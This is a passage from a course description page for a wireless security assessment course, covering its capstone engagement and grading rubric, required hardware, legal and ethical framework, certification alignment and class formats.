  • RE-201 (RE of Burst Radio Signals; WIR-101 is the SDR + waveform-classification prereq)
  • ADV-101 (concurrent-eligible if PEN-101 is done; wireless-CVE labs benefit from WIR-101)
  • OffSec OSWP / SANS GAWN (career-path follow-on)

See the course prerequisite map for the academy-wide map and named track sequences.

Capstone: Simulated Wireless Engagement

A five-day simulated wireless engagement against a Virtus-owned lab space.

Two-tier grading rubric

First, your project must work. The engagement is conducted within stated ROE and FCC regulatory boundaries; site survey + network inventory + per-network security-mode classification are complete; at least one finding (cracked PSK, rogue AP, mis-segmented guest network, exposed BLE service) is documented end-to-end with evidence; the report contains all required sections; the 15-min executive briefing is delivered; technical + non-technical stakeholder questions are answered substantively.

Then we score the report.

  • Technical accuracy + RF-discipline (40%). Security-mode classifications correct (no WPA2 mistakenly tagged WPA3); cracked-handshake transcripts reproducible from the evidence appendix; antenna + transmit-power choices respect FCC Part 15; site-survey heatmap reflects actual signal coverage rather than guessed coverage; sub-GHz findings classified to a defensible protocol family.
  • Report clarity and craft (30%). Client-grade typesetting; site map is legible; executive summary readable by non-technical client; methodology auditable; spelling + grammar clean; remediation guidance prioritized + concrete (not "improve security").
  • Engagement discipline + reflection (30%). ROE respected; transmit operations on shielded / authorized equipment only; OPSEC trade-offs explained (e.g., active probing vs. passive observation); briefing shows the student understands what they would do differently and why.

Submitted artifacts: the full engagement report (PDF, professionally typeset); site-map heatmap; PCAP archive (anonymized where appropriate); cracked-handshake + wordlist archive; 15-min briefing slide deck (~10 slides); one-page lessons-learned memo; private engagement Git repository.

Required Hardware

Item | Purpose | Cost
Alfa AWUS036ACH USB Wi-Fi NIC (monitor-mode, 802.11ac) | 802.11 capture and injection | ~$50
RTL-SDR Blog V4 | Sub-GHz receive | ~$40
nRF52840 dongle (Nordic) | Bluetooth / BLE investigation | ~$15
Directional Wi-Fi antenna (2.4/5 GHz panel or yagi) | Site survey | ~$35

Per-student kit cost beyond the baseline RE-101 workstation: roughly $140. HackRF One is program-supplied for Week 9.

Legal and Ethical Framework

Wireless work has sharper legal edges than IP-network pen testing because RF emissions propagate past property boundaries by default. The course explicitly addresses FCC regulation, CFAA and state equivalents, engagement boundaries, and directional-survey ethics. Students sign the AUP, maintain per-session authorization logs, and perform all transmit activity on lab-owned, RF-shielded equipment where practical.

Certification Alignment


Primary alignment, OffSec OSWP (PEN-210). WIR-101 covers more than OSWP requires (Bluetooth/BLE, sub-GHz, site-survey methodology, client-engagement report format). Students who complete WIR-101 are prepared to sit OSWP within 2-3 months.

Secondary alignment, SANS GAWN (GIAC Assessing and Auditing Wireless Networks). Comprehensive but vendor-tied + cost-prohibitive for most students; WIR-101 covers a structurally similar scope at a fraction of GAWN's cost, with the practitioner discipline (engagement methodology + client report) GAWN's exam form does not measure.

Honestly stated: OSWP is not as widely recognized by employers as OSCP or CompTIA PenTest+, and its material skews historical (WEP-era). Virtus teaches WPA/WPA2/WPA3 as primary content because that is what exists in the field; the cert is earned as a side effect by students who choose to sit it.

Pedagogical-vs-vocational stance. The capstone's 5-day wireless engagement + client-grade report + executive briefing exceed what any cert measures. Employers evaluating Virtus Academy graduates should weight the capstone artifact + reproducible engagement repository alongside (or above) the cert.

Format Prescriptions

Hour budget: ~10 lec hr + ~55 lab hr + ~41 indep hr (= ~106 hr total). 11 weeks of curriculum + a 5-day capstone engagement. Wireless lab work assumes FCC-authorised Wi-Fi spectrum + a controlled BLE + sub-GHz test environment.

Live (standard cadence)

2 sessions/wk × 90 min each (45 min lecture + 45 min hands-on per session) + 30 min stay-after office time. 11 weeks + 5-day capstone. Best for college-elective + adult-learning + homeschool-co-op cadence with shared RF lab access.

Night class (working-adult cadence)

1-2 sessions/wk in evenings; spread over ~22 weeks + capstone weekend. Best for community-college + vocational-tech students with day jobs.

Bootcamp

8 hr/day × 5 days/wk = 40 hr/wk; total ~3 weeks (2 weeks of curriculum + 1 week capstone). Best for adult learners of any age with prereq comfort, dedicated learning time, and access to RF lab equipment. The bootcamp format also serves as a direct OSWP-prep accelerator.

Async self-paced

Lecture hours via recorded video; lab hours require a per-student RF kit (Alfa NIC ~$50 + optional RTL-SDR ~$40; see Required Hardware); indep hours = student pace. Includes Discord-group access (1-2 days/wk instructor-advertised availability). AI-assistant tier add-on. Live 1:1 tutoring premium tier add-on for capstone-engagement coaching + ROE/FCC-compliance review.

High school / homeschool co-op

Adapted live cadence over a school year (~15 weeks at typical school cadence) OR semester (11 weeks at college cadence + capstone). Detailed per-syllabus planning available on request. Note: ROE + FCC compliance instructor sign-off required before any spectrum-active labs.

Interested in VCA-WIR-101?

Email interested@virtuscyberacademy.org with your background and interest.
